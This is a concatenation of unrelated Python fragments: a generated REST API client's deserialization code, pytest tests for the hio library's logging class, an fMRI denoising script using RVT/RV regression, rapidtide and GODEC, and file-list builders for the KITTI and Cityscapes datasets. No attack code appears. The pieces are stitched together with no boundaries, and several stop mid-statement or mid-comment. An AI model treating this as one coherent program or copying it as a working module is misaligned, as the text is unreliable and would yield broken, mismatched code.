self.__deserialize_file(response) if response_type == "str": data: SerializedType = response.text else: try: data = response.json() except ValueError: data = response.content return self.__deserialize(data, response_type) def __deserialize(self, data: SerializedType, klass_name: str) -> DeserializedType: """Deserialize ``dict``, ``list``, and ``str`` into an object. Parameters ---------- data : Union[dict, list, str] Response data to deserialize. klass_name : str Type of object to deserialize the data to. 
The type can be a: * String class name * String type definition for list or dictionary """ if data is None: return None list_match = re.match(r"list\[(.*)]", klass_name) if list_match is not None: assert isinstance(data, list) sub_kls = list_match.group(1) return [self.__deserialize(sub_data, sub_kls) for sub_data in data] dict_match = re.match(r"dict\(([^,]*), (.*)\)", klass_name) if dict_match is not None: assert isinstance(data, dict) sub_kls = dict_match.group(2) return {k: self.__deserialize(v, sub_kls) for k, v in data.items()} if klass_name in self.NATIVE_TYPES_MAPPING: klass = self.NATIVE_TYPES_MAPPING[klass_name] else: klass = self.models[klass_name] if klass in self.PRIMITIVE_TYPES: assert isinstance(data, (str, int, float, bool, bytes)) return self.__deserialize_primitive(data, klass) elif klass == datetime.date: assert isinstance(data, str) return self.__deserialize_date(data) elif klass == datetime.datetime: assert isinstance(data, str) return self.__deserialize_datetime(data) else: assert isinstance(data, dict) return self.__deserialize_model(data, klass) def call_api( self, resource_path: str, method: str, path_params: Union[Dict[str, Union[str, int]], List[Tuple], None] = None, query_params: Union[Dict[str, Union[str, int]], List[Tuple], None] = None, header_params: Union[Dict[str, Union[str, int]], None] = None, body: Optional[DeserializedType] = None, post_params: Optional[List[Tuple]] = None, files: Optional[Dict[str, str]] = None, response_type: Optional[str] = None, _return_http_data_only: Optional[bool] = None, collection_formats: Optional[Dict[str, str]] = None, _preload_content: bool = True, _request_timeout: Union[float, Tuple[float], None] = None, ) -> Union[requests.Response, DeserializedType, None]: """Make the HTTP request and return the deserialized data. Parameters
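
# --- Illustrative usage sketch (assumption, not part of the generated client above) ---
# The endpoint, parameters, and response type below are hypothetical placeholders;
# only the constructor shape (requests.Session + base URL + SessionConfiguration)
# and the call_api()/response_type conventions come from the code and docstring
# examples above.
def _example_fetch_record(client: "ApiClient"):
    """Sketch of how the pieces above compose for a single GET request."""
    return client.call_api(
        resource_path="/records/{id}",     # hypothetical endpoint; {id} is filled by __handle_path_params
        method="GET",
        path_params={"id": 42},
        query_params={"verbose": "true"},  # serialized into a query string by __handle_query_params
        response_type="dict(str, str)",    # matches the dict(...) pattern handled in __deserialize
        _return_http_data_only=True,
    )
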
# -*- encoding: utf-8 -*- """ tests.help.test_ogling module """ import pytest import os import logging from hio import hioing from hio import help from hio.help import ogling def test_openogler(): """ Test context manager openOgler """ # used context manager to directly open an ogler Because loggers are singletons # it still affects loggers. with ogling.openOgler(level=logging.DEBUG) as ogler: # default is temp = True assert isinstance(ogler, ogling.Ogler) assert ogler.name == "test" assert ogler.level == logging.DEBUG assert ogler.temp == True assert ogler.prefix == 'hio' assert ogler.headDirPath == ogler.HeadDirPath == "/usr/local/var" assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n' 'hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') assert not ogler.opened help.ogler.resetLevel(level=help.ogler.level) with ogling.openOgler(name='mine', temp=False, level=logging.DEBUG) as ogler: assert isinstance(ogler, ogling.Ogler) assert ogler.name == "mine" assert ogler.level == logging.DEBUG assert ogler.temp == False assert ogler.prefix == 'hio' assert ogler.headDirPath == ogler.HeadDirPath == "/usr/local/var" assert ogler.dirPath == "/usr/local/var/hio/logs" assert ogler.path == '/usr/local/var/hio/logs/mine.log' assert ogler.opened # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n' 'hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') assert not ogler.opened assert os.path.exists(ogler.path) 
os.remove(ogler.path) assert not os.path.exists(ogler.path) help.ogler.resetLevel(level=help.ogler.level) """End Test""" def test_ogler(): """ Test Ogler class instance that builds loggers """ ogler = ogling.Ogler(name="test", ) assert ogler.path is None assert ogler.opened == False assert ogler.level == logging.ERROR # default is ERROR assert ogler.dirPath == None assert ogler.path == None # logger console: Only Error should log because level ERROR # logger file: Nothing should log because .path not created logger = ogler.getLogger() assert len(logger.handlers) == 2 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") ogler.level = logging.DEBUG # logger console: All should log because level DEBUG # logger file: nothing should log because .path still not created logger = ogler.getLogger() logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") # create ogler with opened path ogler = ogling.Ogler(name="test", level=logging.DEBUG, temp=True, reopen=True, clear=True) assert ogler.level == logging.DEBUG assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened == True with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == '' # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') ogler.temp = False # trick it to not clear on close ogler.close() # but do not clear assert os.path.exists(ogler.path) assert ogler.opened == False ogler.temp = True # restore state # Test reopen but not clear so file still there ogler.reopen(temp=True) assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened == True with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n' 'hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') path = ogler.path ogler.close(clear=True) assert not os.path.exists(path) assert ogler.opened == False # test selective ogler handlers with pytest.raises(hioing.OglerError): ogler = ogling.Ogler(name="test", consoled=False, syslogged=False, filed=False) # Only console # create ogler with opened path ogler = ogling.Ogler(name="test", level=logging.DEBUG, temp=True, reopen=True, clear=True, syslogged=False, filed=False) assert ogler.level 
== logging.DEBUG assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened == True with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == '' # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 1 assert logger.handlers[0] == ogler.baseConsoleHandler logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == '' # Only file # create ogler with opened path ogler = ogling.Ogler(name="test", level=logging.DEBUG, temp=True, reopen=True, clear=True, syslogged=False, consoled=False) assert ogler.level == logging.DEBUG assert ogler.dirPath.startswith("/tmp/hio/logs/test_") assert ogler.dirPath.endswith("_temp") assert ogler.path.endswith("/test.log") assert ogler.opened == True with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == '' # logger console: All should log because level DEBUG # logger file: All should log because path created and DEBUG logger = ogler.getLogger() assert len(logger.handlers) == 1 assert logger.handlers[0] == ogler.baseFileHandler logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") with open(ogler.path, 'r') as logfile: contents = logfile.read() assert contents == ('hio: Test logger at debug level\n' 'hio: Test logger at info level\n' 'hio: Test logger at error level\n') path = ogler.path ogler.close(clear=True) assert not os.path.exists(path) assert ogler.opened == False help.ogler = ogling.initOgler() # reset help.ogler to defaults """End Test""" def test_init_ogler(): """ Test initOgler function for ogler global """ #defined by default in help.__init__ on import of ogling assert isinstance(help.ogler, ogling.Ogler) assert not help.ogler.opened assert help.ogler.level == logging.CRITICAL # default assert help.ogler.dirPath == None assert help.ogler.path == None # nothing should log to file because .path not created and level critical # # nothing should log to console because level critical logger = help.ogler.getLogger() assert len(logger.handlers) == 2 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") help.ogler.level = logging.DEBUG # nothing should log because .path not created despite loggin level debug logger = help.ogler.getLogger() assert len(logger.handlers) == 2 logger.debug("Test logger at debug level") logger.info("Test logger at info level") logger.error("Test logger at error level") #reopen ogler to create path help.ogler.reopen(temp=True, clear=True) assert help.ogler.opened assert help.ogler.level == logging.DEBUG assert help.ogler.dirPath.startswith("/tmp/hio/logs/test_") assert help.ogler.dirPath.endswith("_temp") assert help.ogler.path.endswith("/main.log") logger = help.ogler.getLogger() assert len(logger.handlers) == 3 logger.debug("Test logger at debug level") logger.info("Test
<gh_stars>1-10 """ Perform standard denoising (not TE-dependent denoising). Methods: - Global signal regression with custom code (integrated in tedana, but we do it separately here because the approach is very different) - Dynamic global signal regression with rapidtide - aCompCor with custom code - GODEC with the ME-ICA/godec package - RVT (with lags) regression - RV (with lags) regression """ import argparse import json import os import os.path as op from glob import glob import numpy as np import pandas as pd import rapidtide from nilearn import image from processing_utils import _generic_regression, run_command def run_rvtreg(medn_file, mask_file, confounds_file, out_dir): """Clean MEDN data with regression model including RVT and RVT*RRF (plus lags). Parameters ---------- medn_file mask_file confounds_file out_dir Notes ----- Used for: - Carpet plots of MEDN after regression of RVT + RVT*RRF (S5) - Scatter plot of MEDN-RVT+RVT*RRF SD of global signal against SD of ventilatory envelope (RPV) (S8). """ print("\tRVT", flush=True) # Parse input files medn_name = op.basename(medn_file) prefix = medn_name.split("desc-")[0].rstrip("_") medn_json_file = medn_file.replace(".nii.gz", ".json") # Determine output files denoised_file = op.join(out_dir, f"{prefix}_desc-RVTReg_bold.nii.gz") noise_file = op.join(out_dir, f"{prefix}_desc-RVTReg_errorts.nii.gz") confounds_df = pd.read_table(confounds_file) # Load metadata for writing out later and TR now with open(medn_json_file, "r") as fo: json_info = json.load(fo) nuisance_regressors = confounds_df[ [ "RVTRegression_RVT", "RVTRegression_RVT+5s", "RVTRegression_RVT+10s", "RVTRegression_RVT+15s", "RVTRegression_RVT+20s", "RVTRegression_RVT*RRF", "RVTRegression_RVT*RRF+5s", "RVTRegression_RVT*RRF+10s", "RVTRegression_RVT*RRF+15s", "RVTRegression_RVT*RRF+20s", "trans_x", "trans_y", "trans_z", "rot_x", "rot_y", "rot_z", "trans_x_derivative1", "trans_y_derivative1", "trans_z_derivative1", "rot_x_derivative1", "rot_y_derivative1", "rot_z_derivative1", ] ].values # Some fMRIPrep nuisance regressors have NaN in the first row (e.g., derivatives) nuisance_regressors = np.nan_to_num(nuisance_regressors, 0) denoised_img, noise_img = _generic_regression( medn_file, mask_file, nuisance_regressors, t_r=json_info["RepetitionTime"], ) # Save output files denoised_img.to_filename(denoised_file) noise_img.to_filename(noise_file) # Create json files with Sources and Description fields json_info["Sources"] = [medn_file, mask_file, confounds_file] SUFFIXES = { "desc-RVTReg_bold": ( "Multi-echo denoised data further denoised with a respiratory-volume-per-time-based " "regression model. This model includes RVT lagged 0 seconds, 5 seconds forward, " "10 seconds forward, 15 seconds forward, and 20 seconds forward, " "along with those five RVT-based regressors convolved with " "the respiratory response function, six realigment parameters, " "and the realignment parameters' first derivatives." ), "desc-RVTReg_errorts": ( "Residuals from respiratory-volume-per-time-based regression model applied to " "multi-echo denoised data. This model includes RVT lagged 0 seconds, " "5 seconds forward, 10 seconds forward, 15 seconds forward, and 20 seconds forward, " "along with those three RV-based regressors convolved with " "the respiratory response function, six realigment parameters, " "and the realignment parameters' first derivatives." 
), } for suffix, description in SUFFIXES.items(): nii_file = op.join(out_dir, f"{prefix}_{suffix}.nii.gz") assert op.isfile(nii_file) suff_json_file = op.join(out_dir, f"{prefix}_{suffix}.json") json_info["Description"] = description with open(suff_json_file, "w") as fo: json.dump(json_info, fo, sort_keys=True, indent=4) def run_rvreg(medn_file, mask_file, confounds_file, out_dir): """Clean MEDN data with regression model including RV and RV*RRF (plus lags). Parameters ---------- medn_file mask_file confounds_file out_dir Notes ----- Used for: - Carpet plots of MEDN after regression of RV + RV*RRF (S5) - Scatter plot of MEDN-RV+RV*RRF SD of global signal against SD of ventilatory envelope (RPV) (S8). """ print("\tRV", flush=True) # Parse input files medn_name = op.basename(medn_file) prefix = medn_name.split("desc-")[0].rstrip("_") medn_json_file = medn_file.replace(".nii.gz", ".json") # Determine output files denoised_file = op.join(out_dir, f"{prefix}_desc-RVReg_bold.nii.gz") noise_file = op.join(out_dir, f"{prefix}_desc-RVReg_errorts.nii.gz") confounds_df = pd.read_table(confounds_file) # Load metadata for writing out later and TR now with open(medn_json_file, "r") as fo: json_info = json.load(fo) nuisance_regressors = confounds_df[ [ "RVRegression_RV-3s", "RVRegression_RV", "RVRegression_RV+3s", "RVRegression_RV*RRF-3s", "RVRegression_RV*RRF", "RVRegression_RV*RRF+3s", "trans_x", "trans_y", "trans_z", "rot_x", "rot_y", "rot_z", "trans_x_derivative1", "trans_y_derivative1", "trans_z_derivative1", "rot_x_derivative1", "rot_y_derivative1", "rot_z_derivative1", ] ].values # Some fMRIPrep nuisance regressors have NaN in the first row (e.g., derivatives) nuisance_regressors = np.nan_to_num(nuisance_regressors, 0) denoised_img, noise_img = _generic_regression( medn_file, mask_file, nuisance_regressors, t_r=json_info["RepetitionTime"], ) # Save output files denoised_img.to_filename(denoised_file) noise_img.to_filename(noise_file) # Create json files with Sources and Description fields json_info["Sources"] = [medn_file, mask_file, confounds_file] SUFFIXES = { "desc-RVReg_bold": ( "Multi-echo denoised data further denoised with a respiratory variance-based " "regression model. This model includes RV lagged 3 seconds back, 0 seconds, " "3 seconds forward, along with those three RV-based regressors convolved with " "the respiratory response function, six realigment parameters, " "and the realignment parameters' first derivatives." ), "desc-RVReg_errorts": ( "Residuals from respiratory variance-based regression model applied to multi-echo " "denoised data. This model includes RV lagged 3 seconds back, 0 seconds, " "3 seconds forward, along with those three RV-based regressors convolved with " "the respiratory response function, six realigment parameters, " "and the realignment parameters' first derivatives." ), } for suffix, description in SUFFIXES.items(): nii_file = op.join(out_dir, f"{prefix}_{suffix}.nii.gz") assert op.isfile(nii_file) suff_json_file = op.join(out_dir, f"{prefix}_{suffix}.json") json_info["Description"] = description with open(suff_json_file, "w") as fo: json.dump(json_info, fo, sort_keys=True, indent=4) def run_dgsr(medn_file, mask_file, confounds_file, out_dir): """Run dynamic global signal regression with rapidtide. 
Parameters ---------- medn_file mask_file confounds_file out_dir Notes ----- Used for: - Carpet plots of MEDN after dGSR (3, S12) - QC:RSFC plot of MEDN after dGSR with motion as QC (4, 5, S10, S13) - S10 involves censoring FD>0.2mm - QC:RSFC plot of MEDN after dGSR with RPV as QC (5) - High-low motion plot of MEDN after dGSR (4, S10) - S10 involves censoring FD>0.2mm - Scrubbing plot of MEDN after dGSR (4) - Mean correlation matrix and histogram of MEDN after dGSR (S13) - Correlation scatterplot of MEDN after dGSR against other MEDN outputs (S13) - Scatter plot of MEDN-dGSR SD of global signal against SD of ventilatory envelope (RPV) (not in paper). """ print("\trapidtide", flush=True) # I don't trust that tedana will retain the TR in the nifti header, # so will extract from json directly. medn_json_file = medn_file.replace(".nii.gz", ".json") with open(medn_json_file, "r") as fo: json_info = json.load(fo) t_r = json_info["RepetitionTime"] medn_name = op.basename(medn_file) prefix = medn_name.split("desc-")[0].rstrip("_") dgsr_file = op.join(out_dir, f"{prefix}_desc-lfofilterCleaned_bold.nii.gz") dgsr_noise_file = op.join(out_dir, f"{prefix}_desc-lfofilterCleaned_errorts.nii.gz") # Use the standard denoising settings, with a smoothing kernel equal to 1/2 voxel size, # per rapidtide's recommendation. cmd = ( f"rapidtide --denoising --datatstep {t_r} " f"--motionfile {confounds_file} --denoising --spatialfilt -1 " f"{medn_file} {op.join(out_dir, prefix)}" ) run_command(cmd) # Per the rapidtide documentation, the lfofilterCleaned data have mean included. dgsr_noise_img = image.math_img("img1 - img2", img1=medn_file, img2=dgsr_file) dgsr_noise_img.to_filename(dgsr_noise_file) # Create json files with Sources and Description fields json_info["Sources"] = [medn_file, confounds_file] SUFFIXES = { "desc-lfofilterCleaned_bold": "Multi-echo denoised data further denoised with rapidtide.", "desc-lfofilterCleaned_errorts": ( "Noise time series retained from further denoising multi-echo denoised data with " "rapidtide." ), } for suffix, description in SUFFIXES.items(): nii_file = op.join(out_dir, f"{prefix}_{suffix}.nii.gz") assert op.isfile(nii_file) suff_json_file = op.join(out_dir, f"{prefix}_{suffix}.json") json_info["Description"] = description with open(suff_json_file, "w") as fo: json.dump(json_info, fo, sort_keys=True, indent=4) def run_godec(medn_file, mask_file, out_dir): """Still need to test a bit. Parameters ---------- medn_file mask_file Brain mask. out_dir Notes ----- From the original paper's appendix (page 4): > Our implementation of GODEC is Python-based (godec.py), and included a random sampling > method to estimate the covariance matrix iteratively with a power method as described > below. We also included steps of discrete wavelet transform before and after GODEC to > conserve autocorrelation in the final solution, using the Daubechies wavelet. > A rank-1 approximation was used, with 100 iterations. > ... > We used parameters that returned low-rank spaces with rank approximately of 1-4 to > minimize removal of signals associated with resting state networks. 
Used for: - Carpet plots of MEDN after GODEC (3, S9, S12) - QC:RSFC plot of MEDN after GODEC with motion as QC (4, 5, S10, S13) - S10 involves censoring FD>0.2mm - QC:RSFC plot of MEDN after GODEC with RPV as QC (5) - High-low motion plot of MEDN after GODEC (4, S10) - S10 involves censoring FD>0.2mm - Scrubbing plot of MEDN after GODEC (4) - Mean correlation matrix and histogram of MEDN after GODEC (S13) - Correlation scatterplot of MEDN after GODEC against other MEDN outputs (S13) - Scatter plot of MEDN-GODEC SD of global signal against SD of ventilatory envelope (RPV) (2). """ print("\tgodec", flush=True) from godec import godec_fmri # Parse input files medn_name = op.basename(medn_file) prefix = medn_name.split("desc-")[0].rstrip("_") medn_json_file = medn_file.replace(".nii.gz", ".json") godec_fmri( medn_file, mask_file, out_dir, prefix=prefix, method="greedy", ranks=[4], norm_mode="vn", rank_step_size=1, iterated_power=100, wavelet=True, ) # Load metadata with open(medn_json_file, "r") as fo: json_info = json.load(fo) # Create json files
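
# --- Hedged refactoring sketch (illustrative; not existing project code) ---
# run_rvtreg, run_rvreg, and run_dgsr above each repeat the same loop that writes
# a Description/Sources JSON sidecar next to every derivative NIfTI. A shared
# helper could centralize that; the name and signature here are assumptions.
def _write_sidecars(out_dir, prefix, json_info, suffixes):
    """Write one JSON sidecar per derivative, mirroring the inline SUFFIXES loops above."""
    for suffix, description in suffixes.items():
        nii_file = op.join(out_dir, f"{prefix}_{suffix}.nii.gz")
        assert op.isfile(nii_file)  # the corresponding NIfTI must already have been written
        json_info["Description"] = description
        with open(op.join(out_dir, f"{prefix}_{suffix}.json"), "w") as fo:
            json.dump(json_info, fo, sort_keys=True, indent=4)
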
odometry set, seq. 8 is not available in the raw data frame_min_max_sequence = [[0, 270], [0, 2760], [0, 1100], [0, 1100], [1100, 5170], [0, 1590], [0, 1200], [0, 4540], [0, 4660], [0, 1100]] # get the poses from file for min_max, file in zip(frame_min_max_sequence, files): for i in range(min_max[0], min_max[1] + 1, 1): frame_numbers.append(i) drive = file.split(os.sep)[-3] for i in range(min_max[0], min_max[1] + 1, 1): drives.append(drive) pose = np.loadtxt(file).reshape((-1, 3, 4)) for p in pose: p = list(p) p = [list(i) for i in p] poses.append(p) counter = 0 positions = [] files = [] # get the corresponding filenames and positions from the poses lower_limit = [0] upper_limit = [] old_frame_number = None new_frame_number = None for i, number in zip(range(len(frame_numbers)), frame_numbers): old_frame_number = new_frame_number new_frame_number = number if old_frame_number != new_frame_number - 1 and old_frame_number is not None: upper_limit.append(i - 1) lower_limit.append(i) upper_limit.append(len(frame_numbers) - 1) index = 0 # append the values of positions and files to the data dict for i, file in zip(range(len(main_files)), main_files): main_drive = file.split(os.sep)[-4] main_frame_number = int(os.path.splitext(os.path.split(file)[1])[0]) if main_drive == drives[counter] and main_frame_number == frame_numbers[counter]: temp_position = (main_files.index(file), counter - lower_limit[index], upper_limit[index] - counter, counter) positions.append(temp_position) files.append(file_list[0][main_files.index(file)]) counter += 1 if index < len(lower_limit) - 1 and counter == lower_limit[index + 1]: index += 1 if counter == len(frame_numbers): break print('poses:', len(poses)) position_list.append(positions) file_list.append(files) numerical_list.append(poses) folders_list.append(folders) # save the json dict json_list.update({'folders': folders_list, 'files': file_list, 'positions': position_list, 'numerical_values': numerical_list}) self.json_dict = json_list class KITTI2015FilelistCreator(FilelistCreator): """Class to create the KITTI file list""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def create_json_from_list(self, json_list, stereo_replace): """Creates a dictionary in the format of the basic_files.json. Takes a dictionary with the dataset-specific names and file endings and fills the dictionary self.json_dict with the entries from the dataset folder based on the information in the given dictionary. :param json_list: dataset-spicific dictionary of the form {'names: [list of all data categories that this dataset provides, e.g. 'color', 'depth', ...], 'types': [list of the corresponding file types, e.g. '.png', '.txt', ...], 'filters': [list of the corresponding filters to identify the folders for each name, e.g. 
'camera', ...]} :param stereo_replace: dicionary that defines the strings that have to be interchanged in order to get the right stereo image from the left stereo image: {left_image_string: right_image_string} """ folders_list = [] file_list = [] position_list = [] numerical_list = [] main_files = [] for i, name, type, filter in zip(range(len(json_list['names'])), json_list['names'], json_list['types'], json_list['filters']): folders, files = self.create_filelist(filter, type) folders_list.append(folders) file_list.append(files) positions = [] lower_limit = [0] upper_limit = [] old_frame_number = None new_frame_number = None for file in files: old_frame_number = new_frame_number new_frame_number = int(os.path.splitext(os.path.split(file)[1])[0].split('_')[1]) if old_frame_number != new_frame_number - 1 and old_frame_number is not None: upper_limit.append(files.index(file) - 1) lower_limit.append(files.index(file)) upper_limit.append(len(files) - 1) index = 0 for j, file in zip(range(len(files)), files): folder = os.path.split(os.path.split(os.path.split(file)[0])[0])[1] file = os.path.split(file)[1] file = os.path.join(folder, file) if index < len(lower_limit) - 1 and j == lower_limit[index + 1]: index += 1 if i == 0: positions.append((len(positions), j - lower_limit[index], upper_limit[index] - j, j)) main_files.append(file) else: if 'right' in name: for key in stereo_replace.keys(): file = file.replace(stereo_replace[key], key) positions.append((main_files.index(file), j - lower_limit[index], upper_limit[index] - j, j)) position_list.append(positions) numerical_list.append(None) print('name: ', name, 'num_items: ', len(files)) # camera intrinsic parameters camera_intrinsics = [] camera_intrinsics_right = [] json_list['names'].extend(['camera_intrinsics', 'camera_intrinsics_right']) json_list['types'].extend(['.txt', '.txt']) json_list['filters'].extend(['calib_cam_to_cam', 'calib_cam_to_cam']) for file in main_files: base = file.split(os.sep)[1].split('_')[0] folder = file.split(os.sep)[0] param_file_name = base + '.txt' calib_file = os.path.join(self.dataset_path, folder, 'calib_cam_to_cam', param_file_name) left = open(calib_file).readlines()[:20][-1][6:].split() right = open(calib_file).readlines()[:28][-1][6:].split() left_matrix = np.eye(4) right_matrix = np.eye(4) left_matrix[:3, :3] = np.array([float(l) for l in left]).reshape((3, 3)) right_matrix[:3, :3] = np.array([float(r) for r in right]).reshape((3, 3)) left_matrix = list(left_matrix) right_matrix = list(right_matrix) left_matrix = [list(l) for l in left_matrix] right_matrix = [list(r) for r in right_matrix] camera_intrinsics.append(left_matrix) camera_intrinsics_right.append(right_matrix) print('camera_intrinsics:', len(camera_intrinsics)) print('camera_intrinsics_right:', len(camera_intrinsics_right)) folders_list.extend([folders_list[0], folders_list[1]]) position_list.extend([position_list[0], position_list[0]]) file_list.extend([file_list[0].copy(), file_list[1].copy()]) numerical_list.extend([camera_intrinsics, camera_intrinsics_right]) json_list.update({'folders': folders_list, 'files': file_list, 'positions': position_list, 'numerical_values': numerical_list}) self.json_dict = json_list class VirtualKITTIFilelistCreator(FilelistCreator): """Class to create the Virtual KITTI file list""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def create_json_from_list(self, json_list, stereo_replace=None): """Creates a dictionary in the format of the basic_files.json. 
Takes a dictionary with the dataset-specific names and file endings and fills the dictionary self.json_dict with the entries from the dataset folder based on the information in the given dictionary. :param json_list: dataset-spicific dictionary of the form {'names: [list of all data categories that this dataset provides, e.g. 'color', 'depth', ...], 'types': [list of the corresponding file types, e.g. '.png', '.txt', ...], 'filters': [list of the corresponding filters to identify the folders for each name, e.g. 'camera', ...]} :param stereo_replace: Not used for this Dataset """ folders_list = [] file_list = [] position_list = [] numerical_list = [] main_files = [] for i, name, type, filter in zip(range(len(json_list['names'])), json_list['names'], json_list['types'], json_list['filters']): folders, files = self.create_filelist(filter, type) folders_list.append(folders) file_list.append(files) # positions contains 4-tuples, where the single entries have the following meaning: # 1. global position inside the dataset (sorted by frame number and sequence # 2. number of preceding frames in the sequence # 3. number of frames in the sequence after the current frame # 4. local position inside the list of the elements (e.g. depth has 20000 elements but color has 40000 # then the first entry will contain the mapping from depth to color and the fourth entry will contain # numbers from 0 to 20000 positions = [] lower_limit = [0] # Array containing the index of the starting frames for each video upper_limit = [] # Array containing the index of the end frame for each video old_frame_number = None new_frame_number = None # get the sequence limits (upper and lower) for file in files: old_frame_number = new_frame_number new_frame_number = int(os.path.splitext(os.path.split(file)[1])[0]) # detect start of a new video if old_frame_number != new_frame_number - 1 and old_frame_number is not None: upper_limit.append(files.index(file) - 1) lower_limit.append(files.index(file)) upper_limit.append(len(files) - 1) index = 0 # get the position entries and the file names of all image files, numerical values are handled # differently for j, file in zip(range(len(files)), files): file = file.split(self.dataset_path + os.sep)[1] file = os.path.join(*file.split(os.sep)[1:]) # detect start of a new video if index < len(lower_limit) - 1 and j == lower_limit[index + 1]: index += 1 if i == 0: positions.append((len(positions), j - lower_limit[index], upper_limit[index] - j, j)) main_files.append(file) else: positions.append((main_files.index(file), j - lower_limit[index], upper_limit[index] - j, j)) position_list.append(positions) numerical_list.append(None) print('name: ', name, 'num_items: ', len(files)) json_list.update({'folders': folders_list, 'files': file_list, 'positions': position_list, 'numerical_values': numerical_list}) self.json_dict = json_list class CityscapesFilelistCreator(FilelistCreator): """Class to create the Cityscapes file list""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def create_json_from_list(self, json_list, stereo_replace): """Creates a dictionary in the format of the basic_files.json. Takes a dictionary with the dataset-specific names and file endings and fills the dictionary self.json_dict with the entries from the dataset folder based on the information in the given dictionary. :param json_list: dataset-spicific dictionary of the form {'names: [list of all data categories that this dataset provides, e.g. 
'color', 'depth', ...], 'types': [list of the corresponding file types, e.g. '.png', '.txt', ...], 'filters': [list of the corresponding filters to identify the folders for each name, e.g. 'camera', ...]} :param stereo_replace: dicionary that defines the strings that have to be interchanged in order to get the right stereo image from the left stereo image: {left_image_string: right_image_string} """ # string sequences from corrupted files that should be ignored ignore_extra = ['troisdorf_000000_000073'] ignore_video_left = ['frankfurt_000000_006434', 'frankfurt_000001_023592', 'frankfurt_000001_038767'] ignore_video_right = ['frankfurt_000000_022587', 'frankfurt_000001_026781', 'frankfurt_000001_059933', 'frankfurt_000001_059934', 'frankfurt_000001_060157', 'frankfurt_000001_070159', 'frankfurt_000001_083533'] ignore_list = ignore_extra + ignore_video_left + ignore_video_right folders_list = [] file_list = [] position_list = [] numerical_list = [] main_files = [] for i, name, type, filter in zip(range(len(json_list['names'])), json_list['names'], json_list['types'], json_list['filters']): # cityscapes_extra dataset if 'gtCoarse' in filter: filter.append('train_extra') folders, files = self.create_filelist(filter, type, ignore=ignore_list) if 'segmentation' in name: files = [f for f in files if 'color' not in f and 'instance' not in f] folders_list.append(folders)
